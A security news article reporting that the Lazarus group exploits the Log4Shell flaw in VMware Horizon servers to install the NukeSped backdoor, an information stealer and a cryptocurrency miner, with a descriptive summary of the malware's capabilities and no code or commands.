The North Korean hacking group known as Lazarus is exploiting the Log4J remote code execution vulnerability to inject backdoors that fetch information-stealing payloads on VMware Horizon servers.
The vulnerability is tracked as CVE-2021-44228, aka Log4Shell, and impacts many products, including VMware Horizon.
The exploitation of vulnerable Horizon deployments started in January 2022, but many admins are yet to apply the available security updates.
According to a report published by analysts at Ahnlab’s ASEC, Lazarus has been targeting vulnerable VMware products via Log4Shell since April 2022.
Targeting VMware Horizon servers
To start the attack, the threat actors exploit the Log4j vulnerability through Vmware Horizon’s Apache Tomcat service to execute a PowerShell command. This PowerShell command will ultimately lead to installing the NukeSped backdoor on the server.
NukeSped (or NukeSpeed) is a backdoor malware first associated with DPRK hackers in the summer of 2018 and then linked to a 2020 campaign orchestrated by Lazarus.
The latest variant sampled and analyzed by ASEC is written in C++ and uses RC4 encryption for communicating securely with the C2 infrastructure. Previously, it used XOR.
NukeSped performs various espionage operations in the compromised environment, such as taking screenshots, recording key presses, accessing files, etc. Moreover, NukeSped supports command line commands.
Two new modules seen in the current NukeSped variant are one for dumping USB contents and one for accessing web camera devices.
Lazarus uses NukeSped to install an additional console-based information-stealer malware, which collects information stored on web browsers.
More specifically, the malware analyzed by ASEC can steal the following data:
- Account credentials and browsing history stored in Google Chrome, Mozilla Firefox, Internet Explorer, Opera, and Naver Whale.
- Email account information stored in Outlook Express, MS Office Outlook, and Windows Live Mail.
- Names of recently used files from MS Office (PowerPoint, Excel, and Word) and Hancom 2010.
In some attacks, Lazarus was observed deploying Jin Miner instead of NukeSped by leveraging Log4Shell.
Since Jin Miner is a cryptocurrency miner, Lazarus probably used it on less critical systems targeted for monetary gains instead of cyber-espionage.
Log4Shell remains largely unresolved
Since the start of the year, Lazarus was spotted using LoLBins in Windows-targeting campaigns and malicious cryptocurrency apps to compromise Windows and macOS computers.
The Log4Shell exploitation comes on top of these to underline the variety of tactics used by the hacking group and to underline that the critical RCE flaw remains a significant security problem.
In March, most exploitation attempts were carried out by botnets, so many assumed that the targeting focused on poorly attended systems of lesser importance.
In April, security analysts reminded the public that the Log4Shell attack surface remains huge and will persist for a long time due to practical challenges.
The exploitation attempts of sophisticated threat actors are too few to register in statistics, but this shouldn’t create the illusion that Log4Shell has faded into insignificance.